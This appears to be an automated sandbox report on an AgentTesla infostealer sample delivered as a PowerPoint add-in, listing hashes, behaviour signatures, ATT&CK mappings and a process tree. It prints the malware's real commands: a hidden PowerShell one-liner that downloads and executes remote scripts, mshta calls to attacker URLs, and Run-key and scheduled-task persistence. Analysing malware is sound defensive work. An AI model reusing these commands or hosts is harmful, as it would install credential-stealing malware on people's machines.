agenttesla | deef43f7490a5db9f8f9b688d8bc669ecc360d068e3b40e39de124f85068db2e

General

Target

13.ppam
Size

6KB
MD5

03bbdcead22e9329a234dc39f55f0a2b
SHA1

465b5a304541a673ce583bc20d2dc4746ccec421
SHA256

deef43f7490a5db9f8f9b688d8bc669ecc360d068e3b40e39de124f85068db2e
SHA512

af1dde717ee4c195dd32873ed4205d8b98fcc783bc4379360db084ebb4275ff78361c3be69722698f214f5493205d0753ff9748497ffeee88449077f04031529

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2080	2696	mshta.exe	POWERPNT.EXE

AgentTesla Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3192-313-0x000000000043753E-mapping.dmp	family_agenttesla
behavioral2/memory/3192-369-0x0000000005320000-0x000000000581E000-memory.dmp	family_agenttesla
behavioral2/memory/2536-383-0x000000000043753E-mapping.dmp	family_agenttesla
behavioral2/memory/3192-400-0x0000000005320000-0x000000000581E000-memory.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
34	2080	mshta.exe
35	2080	mshta.exe
37	2080	mshta.exe
39	2080	mshta.exe
41	2080	mshta.exe
43	2080	mshta.exe
44	2080	mshta.exe
48	2080	mshta.exe
50	2080	mshta.exe
52	2080	mshta.exe
54	2080	mshta.exe
56	2080	mshta.exe
58	2080	mshta.exe
59	2080	mshta.exe
63	2628	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

RegAsm.exejsc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_974d936d2f6d4e52831d05712c24a1c9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/14.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 2628 set thread context of 3192	2628	powershell.exe	jsc.exe
PID 2628 set thread context of 2536	2628	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1784 schtasks.exe

pid	process
1784	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2652 taskkill.exe
2536 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

2696 POWERPNT.EXE

pid	process
2652	taskkill.exe
2536	taskkill.exe

pid	process
2696	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exedw20.exejsc.exeRegAsm.exe

pid	process
2628	powershell.exe
2628	powershell.exe
1032	dw20.exe
1032	dw20.exe
2628	powershell.exe
3192	jsc.exe
3192	jsc.exe
2628	powershell.exe
2628	powershell.exe
2536	RegAsm.exe
2536	RegAsm.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

2536 RegAsm.exe

pid	process
2536	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	3192	jsc.exe
Token: SeDebugPrivilege	2536	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

2696 POWERPNT.EXE
2696 POWERPNT.EXE
2696 POWERPNT.EXE
3192 jsc.exe
2536 RegAsm.exe

pid	process
2696	POWERPNT.EXE
2696	POWERPNT.EXE
2696	POWERPNT.EXE
3192	jsc.exe
2536	RegAsm.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 2696 wrote to memory of 2080	2696	POWERPNT.EXE	mshta.exe
PID 2696 wrote to memory of 2080	2696	POWERPNT.EXE	mshta.exe
PID 2080 wrote to memory of 2652	2080	mshta.exe	taskkill.exe
PID 2080 wrote to memory of 2652	2080	mshta.exe	taskkill.exe
PID 2080 wrote to memory of 2536	2080	mshta.exe	taskkill.exe
PID 2080 wrote to memory of 2536	2080	mshta.exe	taskkill.exe
PID 2080 wrote to memory of 1784	2080	mshta.exe	schtasks.exe
PID 2080 wrote to memory of 1784	2080	mshta.exe	schtasks.exe
PID 2080 wrote to memory of 2628	2080	mshta.exe	powershell.exe
PID 2080 wrote to memory of 2628	2080	mshta.exe	powershell.exe
PID 2080 wrote to memory of 1032	2080	mshta.exe	dw20.exe
PID 2080 wrote to memory of 1032	2080	mshta.exe	dw20.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 3192	2628	powershell.exe	jsc.exe
PID 2628 wrote to memory of 1432	2628	powershell.exe	csc.exe
PID 2628 wrote to memory of 1432	2628	powershell.exe	csc.exe
PID 1432 wrote to memory of 1864	1432	csc.exe	cvtres.exe
PID 1432 wrote to memory of 1864	1432	csc.exe	cvtres.exe
PID 2628 wrote to memory of 2908	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2908	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2908	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe
PID 2628 wrote to memory of 2536	2628	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\13.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SYSTEM32\mshta.exe
  mshta.exe https://www.bitly.com/kddjkdwokddwodkwodki
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/14.html\""
    3⤵
    - Creates scheduled task(s)
    PID:1784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_974d936d2f6d4e52831d05712c24a1c9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fca89e4173af436497e274a5e70b6145.txt').GetResponse().GetResponseStream()).ReadToend());
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3192
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wq3urxyl\wq3urxyl.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1432
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A17.tmp" "c:\Users\Admin\AppData\Local\Temp\wq3urxyl\CSCC014C2515F12473B87289BE55AC04FA8.TMP"
        5⤵
        
        PID:1864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2908
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: SetClipboardViewer
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_office_path
      outlook_win_path
      PID:2536
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    dw20.exe -x -s 2216
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3A17.tmp

MD5
813d0e8acc4ec6148a2fed4d5be4f08b

SHA1
0b61f385ccef556a2a857660d3ab9dd10ec3f731

SHA256
4eb0ca61dd02b5201334bdff36be4a51e582124f84a00619d25a08e170929211

SHA512
0a4ad80a4c6ab17f8f96157499555ea0c7bdeeb405d9e05184715312abe8154f5ccde19676466c526b041024780d6615ecf745ca4a76a73b8b71c50d2a403fec

Download Submit
C:\Users\Admin\AppData\Local\Temp\wq3urxyl\wq3urxyl.dll

MD5
866a0038bba2441f4d667bd9d6bf5dfa

SHA1
b0566eee8aef75eb5c05551d0176cc2bac5c5323

SHA256
c57e1557138516dd0d7bca04a0a1251c52fa3cdbd3a825c5ae164a2a0a09b05c

SHA512
6fbc4d95696971792548ec6591bb180db5d267a8a50817e5b7d9d3d28a4135cebd90ea15fd5f6b22df8cbdcdd798ca3d6f7adfc42a387f0781d732f8c2169186

Download Submit
C:\Windows\system32\drivers\etc\hosts

MD5
5b2d17233558878a82ee464d04f58b59

SHA1
47ebffcad0b4c358df0d6a06ef335cb6aab0ab20

SHA256
5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542

SHA512
d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wq3urxyl\CSCC014C2515F12473B87289BE55AC04FA8.TMP

MD5
1e06475af0a7886c59e8c86f19866d8b

SHA1
fe887f87f7decb97ac0b1f42ba0c1c89e45a2aaf

SHA256
87540d8ec1e462491d53e9b40f885416fa702bd1aeb6a9a9b7598283a1ef361b

SHA512
c1c3becc7f910e0ec38037c8df797286d3d27da5186ac8f74ba389c5d307cef82af47e3d7a03fba42c7910a5818977e276d71181a00fd7a85bc7cab303aece67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wq3urxyl\wq3urxyl.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wq3urxyl\wq3urxyl.cmdline

MD5
8b04ae2dc344a80b16b428757d95c43b

SHA1
f924df458892aa109be1802d0284923a38ad673c

SHA256
dadad1240d71c907e6a93946d0f21f707a46140ae8b1089f05ea73280ef38ec7

SHA512
d189ebaf11529d1b253dcf3e823473e847783265fd989dad74eb63f35ad282e9f93df20307253bdbbfadfc709d52179d3e2d44556af8ad804759b6d24410b094

Download Submit
memory/1032-287-0x0000000000000000-mapping.dmp

Download
memory/1432-372-0x0000000000000000-mapping.dmp

Download
memory/1784-285-0x0000000000000000-mapping.dmp

Download
memory/1864-375-0x0000000000000000-mapping.dmp

Download
memory/2080-254-0x0000000000000000-mapping.dmp

Download
memory/2536-284-0x0000000000000000-mapping.dmp

Download
memory/2536-383-0x000000000043753E-mapping.dmp

Download
memory/2536-389-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/2536-399-0x00000000057C1000-0x00000000057C2000-memory.dmp

Filesize
4KB

Download
memory/2628-293-0x00000297FA350000-0x00000297FA352000-memory.dmp

Filesize
8KB

Download
memory/2628-294-0x00000297FA353000-0x00000297FA355000-memory.dmp

Filesize
8KB

Download
memory/2628-306-0x00000297FA356000-0x00000297FA358000-memory.dmp

Filesize
8KB

Download
memory/2628-286-0x0000000000000000-mapping.dmp

Download
memory/2652-283-0x0000000000000000-mapping.dmp

Download
memory/2696-115-0x00007FFED4D40000-0x00007FFED4D50000-memory.dmp

Filesize
64KB

Download
memory/2696-122-0x00000221B0C50000-0x00000221B0C52000-memory.dmp

Filesize
8KB

Download
memory/2696-121-0x00007FFED4D40000-0x00007FFED4D50000-memory.dmp

Filesize
64KB

Download
memory/2696-120-0x00000221B0C50000-0x00000221B0C52000-memory.dmp

Filesize
8KB

Download
memory/2696-119-0x00000221B0C50000-0x00000221B0C52000-memory.dmp

Filesize
8KB

Download
memory/2696-118-0x00007FFED4D40000-0x00007FFED4D50000-memory.dmp

Filesize
64KB

Download
memory/2696-117-0x00007FFED4D40000-0x00007FFED4D50000-memory.dmp

Filesize
64KB

Download
memory/2696-116-0x00007FFED4D40000-0x00007FFED4D50000-memory.dmp

Filesize
64KB

Download
memory/3192-369-0x0000000005320000-0x000000000581E000-memory.dmp

Filesize
5.0MB

Download
memory/3192-313-0x000000000043753E-mapping.dmp

Download
memory/3192-400-0x0000000005320000-0x000000000581E000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads